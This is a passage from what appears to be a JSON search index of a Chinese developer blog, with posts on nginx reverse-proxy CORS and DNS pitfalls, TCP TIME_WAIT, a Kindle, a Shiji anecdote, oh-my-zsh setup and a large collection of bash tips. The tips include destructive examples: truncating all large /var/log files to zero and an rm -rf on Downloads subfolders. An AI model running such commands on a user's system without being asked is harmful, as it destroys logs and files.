to fetch the resource with CORS disabled. 
参考链接 http://nginx.org/en/docs/http/ngx_http_headers_module.html http://www.hxs.biz/html/20180425122255.html https://blog.csdn.net/xiojing825/article/details/83383524 https://cloud.tencent.com/developer/article/1470375 https://blog.csdn.net/bbg221/article/details/79886979 ","permalink":"https://wdd.js.org/posts/2020/02/ngse8g/","summary":"下文的论述都以下面的配置为例子\nlocation ^~ /p/security { rewrite /p/security/(.*) /security/$1 break; proxy_pass http://security:8080; proxy_redirect off; proxy_set_header Host $host; add_header \u0026#39;Access-Control-Allow-Origin\u0026#39; \u0026#39;*\u0026#39; always; add_header \u0026#39;Access-Control-Allow-Credentials\u0026#39; \u0026#39;true\u0026#39; always; } 如果dns无法解析,nginx则无法启动 security如果无法解析,那么nginx则无法启动 DNS缓存问题: nginx启动时,如果将security dns解析为1.2.3.4。如果security的ip地址变了。nginx不会自动解析新的ip地址,导致反向代理报错504。 反向代理的DNS缓存问题务必重视 跨域头配置的always 反向代理一般都是希望允许跨域的。如果不加always,那么只会对成功的请求加跨域头,失败的请求则不会。 关于**\u0026lsquo;Access-Control-Allow-Origin\u0026rsquo; \u0026lsquo;*\u0026rsquo;,如果后端服务本身就带有这个头,那么如果你在nginx中再添加这个头,就会在浏览器中遇到下面的报错。而解决办法就是不要在nginx中设置这个头。**\nAccess to fetch at \u0026#39;http://192.168.40.107:31088/p/security/v2/login\u0026#39; from origin \u0026#39;http://localhost:5000\u0026#39; has been blocked by CORS policy: Response to preflight request doesn\u0026#39;t pass access control check: The \u0026#39;Access-Control-Allow-Origin\u0026#39; header contains multiple values \u0026#39;*, *\u0026#39;, but only one is allowed.","title":"我走过的nginx反向代理的坑"},{"content":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。\n","permalink":"https://wdd.js.org/posts/2020/02/amkcs2/","summary":"2018年1月26日,我在京东上买了一个Kindle Paperwhite, 
距离今天,大概已经2年多一点了。\n我是一个重度读者,每天都会花上一些时间去阅读。最近两天发现,本来可以连续两周不用充电的kindle。基本上现在是电量以每天50%的速度减少。或许,2年,就是kindle的寿命。\n刚开始读书总觉得没有什么进度,后来我就喜欢把每天读书的进度给记录下来。这样做的好处是能够督促我不要偷懒,\n我读书有个习惯,每天以至少1%的进度去读一本书,并且我会将进度记录下来。基本上,我每天会读7-8本书的1%。\n两年时间内我读过的书,要比我从小学到大学读过的书都要多。","title":"kindle阅读器的寿命"},{"content":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接会在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。服务端在响应头中回应Connection: Keep-Alive。则说明服务端同意持久连接。\n如果服务端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WAIT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。\n","permalink":"https://wdd.js.org/network/sq4l53/","summary":"在事务结束之后,仍然保持在打开状态的链接称为持久连接。非持久的链接会在每个事务结束之后就会关闭。\n持久连接的好处 避免缓慢的链接建立阶段 避免慢启动的拥塞适应阶段 Keep-Alive 客户端发起请求,带有Connection: Keep-Alive头。服务端在响应头中回应Connection: Keep-Alive。则说明服务端同意持久连接。\n如果服务端不同意持久连接,就会在响应头中返回Connection: Close\n注意事项\n即使服务端同意了持久连接,服务端也可以随时关闭连接 HTTP 1.0 协议,必须显式传递Connection: Keep-Alive,服务端才会激活持久连接 HTTP 1.1 协议,默认就是持久连接 在通信双方中,主动关闭连接的一方会进入TIME_WAIT状态,而被动关闭的一方则不会进入该状态。\nTIME_WAIT连接太多 服务端太多的TIME_WAIT连接,则说明连接是服务端主动去关闭的。查看了响应头,内容也是Connection: Close。\n我们知道,一般情况下TIME_WAIT状态的链接至少会持续60秒。也就是说该连接占用的内存至少在60秒内不会释放。\n当连接太多时,就有可能产生out of memory的问题,而操作系统就会很有可能把这个进程给kill掉,进而导致服务不可用。","title":"TIME_WAIT与持久连接"},{"content":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 
与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?\n","permalink":"https://wdd.js.org/posts/2020/01/encss4/","summary":"最早听说“三过家门而不入”,是说禹治水大公无私,路过家门都没有回家。\n最近看到史记,发现这句话原本是\n禹伤先人父鲧(发音和滚相同)功之不成受诛,乃劳身焦思,居外十三年,过家门不敢入\n\u0026ldquo;三过家门而不入\u0026quot;这个短语中, 与原文少一个“敢”字,少了一个字,含义差距很大。\n没有敢字,说明是自己主动的。加上敢字,则会让人思考。禹为什么不敢回家?他在怕什么呢?\n这里就需要提到禹的父亲鲧。\n鲧治水九年,没有把水治理好。在舜巡视的时候,被赐死在羽山。\n舜登用,摄行天子之政,巡狩。行视鲧之治水无状,乃殛(发音和即相同)鲧于羽山以死\n所以,如果禹治不好水,你想禹的下场是什么?","title":"论禹三过家门而不入的真实原因"},{"content":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,向主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味有故障? ","permalink":"https://wdd.js.org/network/yoc1k0/","summary":"在《tcp/ip详解卷一》中,有幅图介绍了TCP的状态迁移,TCP的状态转移并不简单,我们本次重点关注TIME_WAIT状态。\nTIME-WAIT 主机1发起FIN关闭连接请求,主机2发送ACK确认,然后也发送FIN。主机1在收到FIN之后,向主机2发送了ACK。\n在主机1发送ACK时,主机1就进入了TIME-WAIT状态。\n主动发起关闭连接的一方会有TIME-WAIT状态 如果两方同时发起关闭连接请求,那么两方都会进入TIME-WAIT状态 TIME-WAIT的时长在 /proc/sys/net/ipv4/tcp_fin_timeout 中配置,一般是60s 为什么要有TIME-WAIT状态? 太多TIME-WAIT链接是否意味有故障? 
","title":"漫话TCP TIME-WAIT状态【ing】"},{"content":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $? # 上个进程的退出码 echo $* # 类似列表方式,但是参数被当做一个实体, \u0026#34;$1c$2c$3\u0026#34; c是IFS的第一个字符 echo $0 # 脚本名 echo $1 $2 $3 # 第一、第二、第三个参数 for i in $@ do echo $i done for j in $@ do echo $j done 判断git仓库是否clean check_is_repo_clean () { if [ -n \u0026#34;$(git status --porcelain)\u0026#34; ]; then echo \u0026#34;Working directory is not clean\u0026#34; exit 1 fi } 文件批处理 for in循环 for f in *.txt; do mv $f $f.gz; done for d in *.gz; do gunzip $d; done shell 重定向到/dev/null ls \u0026amp;\u0026gt;/dev/null; #标准错误和标准输出都不想看 ls 1\u0026gt;/dev/null; #不想看标准输出 ls 2\u0026gt;/dev/null; 标准错误不想看 sed: -e expression #1, char 21: unknown option to `s' 出现这个问题,一般是要替换的字符串中也有/符号,所以要把分隔符改成 ! 
或者 |\nsed -i \u0026#34;s!WJ_CONF_URL!$WJ_CONF_URL!g\u0026#34; file.txt 发送UDP消息 在shell是bash的时候, 可以使用 echo 或者 cat将内容重定向到 /dev/udp/ip/port中,来发送udp消息\necho \u0026#34;hello\u0026#34; \u0026gt; /dev/udp/192.168.1.1/8000 grep排除自身 下面查找名称包括rtpproxy的进程,grep出来找到这个进程外,还找到了grep这条语句的进程,一般来说,这个进程是多余的。\n➜ ~ ps aux | grep rtpproxy root 3353 0.3 0.0 186080 968 ? Sl 2019 250:05 rtpproxy -f -l root 31440 0.0 0.0 112672 980 pts/0 S+ 10:12 0:00 grep --color=auto --exclude-dir=.bzr --exclude-dir=CVS --exclude-dir=.git --exclude-dir=.hg --exclude-dir=.svn rtpproxy 但是,如果我们用中括号,将搜索关键词的第一个字符包裹起来,就可以排除grep自身。\n[root@localhost ~]# ps aux | grep \u0026#39;[r]tpproxy\u0026#39; root 3353 0.3 0.0 186080 968 ? Sl 2019 250:06 rtpproxy -f -l ","permalink":"https://wdd.js.org/shell/all-in-one/","summary":"命令行编辑 向左移动光标\tctrl + b 向右移动光标\tctrl + f 移动光标到行尾\tctrl + e 移动光标到行首\tctrl + a 清除前面一个词\tctrl + w 清除光标到行首\tctrl + u 清除光标到行尾\tctrl + k 命令行搜索\tctrl + r 解压与压缩 1、压缩命令: 命令格式:\ntar -zcvf 压缩文件名 .tar.gz 被压缩文件名 可先切换到当前目录下,压缩文件名和被压缩文件名都可加入路径。\n2、解压缩命令: 命令格式:\ntar -zxvf 压缩文件名.tar.gz 解压缩后的文件只能放在当前的目录。\ncrontab 每隔x秒执行一次 每隔5秒\n* * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔15秒\n* * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 awk从第二行开始读取 awk \u0026#39;NR\u0026gt;2{print $1}\u0026#39; 查找大文件,并清空文件内容 find /var/log -type f -size +1M -exec truncate --size 0 \u0026#39;{}\u0026#39; \u0026#39;;\u0026#39; switch case 语句 echo \u0026#39;Input a number between 1 to 4\u0026#39; echo \u0026#39;Your number is:\\c\u0026#39; read aNum case $aNum in 1) echo \u0026#39;You select 1\u0026#39; ;; 2) echo \u0026#39;You select 2\u0026#39; ;; 3) echo \u0026#39;You select 3\u0026#39; ;; 4) echo \u0026#39;You select 4\u0026#39; ;; *) echo \u0026#39;You do not select a number between 1 to 4\u0026#39; ;; esac 以$开头的特殊变量 echo $$ # 进程pid echo $# # 收到的参数个数 echo $@ # 列表方式的参数 $1 $2 $3 echo $?","title":"常用shell技巧"},{"content":"参考 
https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","permalink":"https://wdd.js.org/opensips/ch9/webrtc-pdf/","summary":"参考 https://www.opensips.org/Documentation/Tutorials-WebSocket-2-2 https://opensips.org/pub/events/2016-05-10_OpenSIPS-Summit_Amsterdam/Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf pdf附件 Eric_Tamme-OpenSIPS_Summit_Austin_2015-WebRTC_with_OpenSIPS.pdf Pete_Kelly-OpenSIPS_Summit2016-OpenSIPSandWebRTC.pdf ","title":"opensips 与 webrtc资料整理"},{"content":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","permalink":"https://wdd.js.org/shell/manu-install-ohmyzsh/","summary":"yum install zsh -y # github上的项目下载太慢,所以我就把项目克隆到gitee上,这样克隆速度就非常快 git clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh # 这一步是可选的 cp ~/.zshrc ~/.zshrc.orig # 这一步是必须的 cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc # 改变默认的sh, 如果这一步报错,就再次输入 zsh chsh -s $(which zsh) ","title":"手工安装oh-my-zsh"},{"content":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","permalink":"https://wdd.js.org/shell/m4-env/","summary":"define(`CF_INNER_IP\u0026#39;, `esyscmd(`printf \u0026#34;$PWD\u0026#34;\u0026#39;)\u0026#39;) ","title":"m4读取环境变量"},{"content":"字符串 字符串包含 Using a test:\nif [[ $var == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in var.\u0026#34; fi # Inverse (substring not in string). 
if [[ $var != *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is not in var.\u0026#34; fi # This works for arrays too! if [[ ${arr[*]} == *sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;sub_string is in array.\u0026#34; fi Using a case statement:\ncase \u0026#34;$var\u0026#34; in *sub_string*) # Do stuff ;; *sub_string2*) # Do more stuff ;; *) # Else ;; esac 字符串开始 if [[ $var == sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var starts with sub_string.\u0026#34; fi # Inverse (var does not start with sub_string). if [[ $var != sub_string* ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not start with sub_string.\u0026#34; fi 字符串结尾 if [[ $var == *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var ends with sub_string.\u0026#34; fi # Inverse (var does not end with sub_string). if [[ $var != *sub_string ]]; then printf \u0026#39;%s\\n\u0026#39; \u0026#34;var does not end with sub_string.\u0026#34; fi 循环 数字范围循环 Alternative to seq.\n# Loop from 0-100 (no variable support). for i in {0..100}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 变量循环 Alternative to seq.\n# Loop from 0-VAR. VAR=50 for ((i=0;i\u0026lt;=VAR;i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$i\u0026#34; done 数组遍历 arr=(apples oranges tomatoes) # Just elements. for element in \u0026#34;${arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$element\u0026#34; done 索引遍历 arr=(apples oranges tomatoes) # Elements and index. for i in \u0026#34;${!arr[@]}\u0026#34;; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done # Alternative method. for ((i=0;i\u0026lt;${#arr[@]};i++)); do printf \u0026#39;%s\\n\u0026#39; \u0026#34;${arr[i]}\u0026#34; done 文件或者目录遍历 Don’t use ls.\n# Greedy example. for file in *; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # PNG files in dir. 
for file in ~/Pictures/*.png; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate over directories. for dir in ~/Downloads/*/; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$dir\u0026#34; done # Brace Expansion. for file in /path/to/parentdir/{file1,file2,subdir/file3}; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done # Iterate recursively. shopt -s globstar for file in ~/Pictures/**/*; do printf \u0026#39;%s\\n\u0026#39; \u0026#34;$file\u0026#34; done shopt -u globstar 文件处理 CAVEAT: bash does not handle binary data properly in versions \u0026lt; 4.4.\n将文件读取为字符串 Alternative to the cat command.\nfile_data=\u0026#34;$(\u0026lt;\u0026#34;file\u0026#34;)\u0026#34; 将文件按行读取成数组 Alternative to the cat command.\n# Bash \u0026lt;4 (discarding empty lines). IFS=$\u0026#39;\\n\u0026#39; read -d \u0026#34;\u0026#34; -ra file_data \u0026lt; \u0026#34;file\u0026#34; # Bash \u0026lt;4 (preserving empty lines). while read -r line; do file_data+=(\u0026#34;$line\u0026#34;) done \u0026lt; \u0026#34;file\u0026#34; # Bash 4+ mapfile -t file_data \u0026lt; \u0026#34;file\u0026#34; 获取文件头部的 N 行 Alternative to the head command.\nCAVEAT: Requires bash 4+\nExample Function:\nhead() { # Usage: head \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn \u0026#34;$1\u0026#34; line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]}\u0026#34; } Example Usage:\n$ head 2 ~/.bashrc # Prompt PS1=\u0026#39;➜ \u0026#39; $ head 1 ~/.bashrc # Prompt 获取尾部 N 行 Alternative to the tail command.\nCAVEAT: Requires bash 4+\nExample Function:\ntail() { # Usage: tail \u0026#34;n\u0026#34; \u0026#34;file\u0026#34; mapfile -tn 0 line \u0026lt; \u0026#34;$2\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${line[@]: -$1}\u0026#34; } Example Usage:\n$ tail 2 ~/.bashrc # Enable tmux. 
# [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux $ tail 1 ~/.bashrc # [[ -z \u0026#34;$TMUX\u0026#34; ]] \u0026amp;\u0026amp; exec tmux 获取文件行数 Alternative to wc -l.\nExample Function (bash 4):\nlines() { # Usage: lines \u0026#34;file\u0026#34; mapfile -tn 0 lines \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;${#lines[@]}\u0026#34; } Example Function (bash 3):\nThis method uses less memory than the mapfile method and works in bash 3 but it is slower for bigger files.\nlines_loop() { # Usage: lines_loop \u0026#34;file\u0026#34; count=0 while IFS= read -r _; do ((count++)) done \u0026lt; \u0026#34;$1\u0026#34; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$count\u0026#34; } Example Usage:\n$ lines ~/.bashrc 48 $ lines_loop ~/.bashrc 48 计算文件或者文件夹数量 This works by passing the output of the glob to the function and then counting the number of arguments.\nExample Function:\ncount() { # Usage: count /path/to/dir/* # count /path/to/dir/*/ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$#\u0026#34; } Example Usage:\n# Count all files in dir. $ count ~/Downloads/* 232 # Count all dirs in dir. $ count ~/Downloads/*/ 45 # Count all jpg files in dir. $ count ~/Pictures/*.jpg 64 创建临时文件 Alternative to touch.\n# Shortest. \u0026gt;file # Longer alternatives: :\u0026gt;file echo -n \u0026gt;file printf \u0026#39;\u0026#39; \u0026gt;file 在两个标记之间抽取 N 行 Example Function:\nextract() { # Usage: extract file \u0026#34;opening marker\u0026#34; \u0026#34;closing marker\u0026#34; while IFS=$\u0026#39;\\n\u0026#39; read -r line; do [[ $extract \u0026amp;\u0026amp; $line != \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; printf \u0026#39;%s\\n\u0026#39; \u0026#34;$line\u0026#34; [[ $line == \u0026#34;$2\u0026#34; ]] \u0026amp;\u0026amp; extract=1 [[ $line == \u0026#34;$3\u0026#34; ]] \u0026amp;\u0026amp; extract= done \u0026lt; \u0026#34;$1\u0026#34; } Example Usage:\n# Extract code blocks from MarkDown file. 
$ extract ~/projects/pure-bash/README.md \u0026#39;```sh\u0026#39; \u0026#39;```\u0026#39; # Output here... 文件路径 获取文件的目录 Alternative to the dirname command.\nExample Function:\ndirname() { # Usage: dirname \u0026#34;path\u0026#34; local tmp=${1:-.} [[ $tmp != *[!/]* ]] \u0026amp;\u0026amp; { printf \u0026#39;/\\n\u0026#39; return } tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} [[ $tmp != */* ]] \u0026amp;\u0026amp; { printf \u0026#39;.\\n\u0026#39; return } tmp=${tmp%/*} tmp=${tmp%%\u0026#34;${tmp##*[!/]}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ dirname ~/Pictures/Wallpapers/1.jpg /home/black/Pictures/Wallpapers $ dirname ~/Pictures/Downloads/ /home/black/Pictures 获取文件路径的 base-name Alternative to the basename command.\nExample Function:\nbasename() { # Usage: basename \u0026#34;path\u0026#34; [\u0026#34;suffix\u0026#34;] local tmp tmp=${1%\u0026#34;${1##*[!/]}\u0026#34;} tmp=${tmp##*/} tmp=${tmp%\u0026#34;${2/\u0026#34;$tmp\u0026#34;}\u0026#34;} printf \u0026#39;%s\\n\u0026#39; \u0026#34;${tmp:-/}\u0026#34; } Example Usage:\n$ basename ~/Pictures/Wallpapers/1.jpg 1.jpg $ basename ~/Pictures/Wallpapers/1.jpg .jpg 1 $ basename ~/Pictures/Downloads/ Downloads 变量 变量声明和使用 $ hello_world=\u0026#34;value\u0026#34; # Create the variable name. $ var=\u0026#34;world\u0026#34; $ ref=\u0026#34;hello_$var\u0026#34; # Print the value of the variable name stored in \u0026#39;hello_$var\u0026#39;. $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;${!ref}\u0026#34; value Alternatively, on bash 4.3+:\n$ hello_world=\u0026#34;value\u0026#34; $ var=\u0026#34;world\u0026#34; # Declare a nameref. 
$ declare -n ref=hello_$var $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$ref\u0026#34; value 基于变量命名变量 $ var=\u0026#34;world\u0026#34; $ declare \u0026#34;hello_$var=value\u0026#34; $ printf \u0026#39;%s\\n\u0026#39; \u0026#34;$hello_world\u0026#34; value ESCAPE SEQUENCES Contrary to popular belief, there is no issue in utilizing raw escape sequences. Using tput abstracts the same ANSI sequences as if printed manually. Worse still, tput is not actually portable. There are a number of tput variants each with different commands and syntaxes (try tput setaf 3 on a FreeBSD system). Raw sequences are fine.\n文本颜色 NOTE: Sequences requiring RGB values only work in True-Color Terminal Emulators.\nSequence What does it do? Value \\e[38;5;\u0026lt;NUM\u0026gt;m Set text foreground color. 0-255 \\e[48;5;\u0026lt;NUM\u0026gt;m Set text background color. 0-255 \\e[38;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text foreground color to RGB color. R, G, B \\e[48;2;\u0026lt;R\u0026gt;;\u0026lt;G\u0026gt;;\u0026lt;B\u0026gt;m Set text background color to RGB color. R, G, B 文本属性 NOTE: Prepend 2 to any code below to turn its effect off (examples: 21=bold text off, 22=faint text off, 23=italic text off).\nSequence What does it do? \\e[m Reset text formatting and colors. \\e[1m Bold text. \\e[2m Faint text. \\e[3m Italic text. \\e[4m Underline text. \\e[5m Blinking text. \\e[7m Highlighted text. \\e[8m Hidden text. \\e[9m Strike-through text. 光标移动 Sequence What does it do? Value \\e[\u0026lt;LINE\u0026gt;;\u0026lt;COLUMN\u0026gt;H Move cursor to absolute position. line, column \\e[H Move cursor to home position (0,0). \\e[\u0026lt;NUM\u0026gt;A Move cursor up N lines. num \\e[\u0026lt;NUM\u0026gt;B Move cursor down N lines. num \\e[\u0026lt;NUM\u0026gt;C Move cursor right N columns. num \\e[\u0026lt;NUM\u0026gt;D Move cursor left N columns. num \\e[s Save cursor position. \\e[u Restore cursor position. 文本擦除 Sequence What does it do? 
\\e[K Erase from cursor position to end of line. \\e[1K Erase from cursor position to start of line. \\e[2K Erase the entire current line. \\e[J Erase from the current line to the bottom of the screen. \\e[1J Erase from the current line to the top of the screen. \\e[2J Clear the screen. \\e[2J\\e[H Clear the screen and move cursor to 0,0. 参数展开 指令 Parameter What does it do? ${!VAR} Access a variable based on the value of VAR. ${!VAR*} Expand to IFS separated list of variable names starting with VAR. ${!VAR@} Expand to IFS separated list of variable names starting with VAR. If double-quoted, each variable name expands to a separate word. 替换 Parameter What does it do? ${VAR#PATTERN} Remove shortest match of pattern from start of string. ${VAR##PATTERN} Remove longest match of pattern from start of string. ${VAR%PATTERN} Remove shortest match of pattern from end of string. ${VAR%%PATTERN} Remove longest match of pattern from end of string. ${VAR/PATTERN/REPLACE} Replace first match with string. ${VAR//PATTERN/REPLACE} Replace all matches with string. ${VAR/PATTERN} Remove first match. ${VAR//PATTERN} Remove all matches. 长度 Parameter What does it do? ${#VAR} Length of var in characters. ${#ARR[@]} Length of array in elements. 展开 Parameter What does it do? ${VAR:OFFSET} Remove first N chars from variable. ${VAR:OFFSET:LENGTH} Get substring from N character to N character. (${VAR:10:10}: Get sub-string from char 10 to char 20) ${VAR:: OFFSET} Get first N chars from variable. ${VAR:: -OFFSET} Remove last N chars from variable. ${VAR: -OFFSET} Get last N chars from variable. ${VAR:OFFSET:-OFFSET} Cut first N chars and last N chars. 大小写修改 Parameter What does it do? CAVEAT ${VAR^} Uppercase first character. bash 4+ ${VAR^^} Uppercase all characters. bash 4+ ${VAR,} Lowercase first character. bash 4+ ${VAR,,} Lowercase all characters. bash 4+ ${VAR~} Reverse case of first character. bash 4+ ${VAR~~} Reverse case of all characters. bash 4+ 默认值 Parameter What does it do? 
${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 大括号展开 范围 # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;} # Print numbers 1-100. echo {1..100} # Print range of floats. echo 1.{1..9} # Print chars a-z. echo {a..z} echo {A..Z} # Nesting. echo {A..Z}{0..9} # Print zero-padded numbers. # CAVEAT: bash 4+ echo {01..100} # Change increment amount. # Syntax: {\u0026lt;START\u0026gt;..\u0026lt;END\u0026gt;..\u0026lt;INCREMENT\u0026gt;} # CAVEAT: bash 4+ echo {1..10..2} # Increment by 2. 字符串列表 echo {apples,oranges,pears,grapes} # Example Usage: # Remove dirs Movies, Music and ISOS from ~/Downloads/. rm -rf ~/Downloads/{Movies,Music,ISOS} 条件表达式 文件条件判断 Expression Value What does it do? -a file If file exists. -b file If file exists and is a block special file. -c file If file exists and is a character special file. -d file If file exists and is a directory. -e file If file exists. -f file If file exists and is a regular file. -g file If file exists and its set-group-id bit is set. -h file If file exists and is a symbolic link. -k file If file exists and its sticky-bit is set -p file If file exists and is a named pipe (FIFO). -r file If file exists and is readable. -s file If file exists and its size is greater than zero. -t fd If file descriptor is open and refers to a terminal. -u file If file exists and its set-user-id bit is set. -w file If file exists and is writable. -x file If file exists and is executable. -G file If file exists and is owned by the effective group ID. -L file If file exists and is a symbolic link. 
-N file If file exists and has been modified since last read. -O file If file exists and is owned by the effective user ID. -S file If file exists and is a socket. 文件比较 Expression What does it do? file -ef file2 If both files refer to the same inode and device numbers. file -nt file2 If file is newer than file2 (uses modification time) or file exists and file2 does not. file -ot file2 If file is older than file2 (uses modification time) or file2 exists and file does not. 变量测试 Expression Value What does it do? -o opt If shell option is enabled. -v var If variable has a value assigned. -R var If variable is a name reference. -z var If the length of string is zero. -n var If the length of string is non-zero. 变量比较 Expression What does it do? var = var2 Equal to. var == var2 Equal to (synonym for =). var != var2 Not equal to. var \u0026lt; 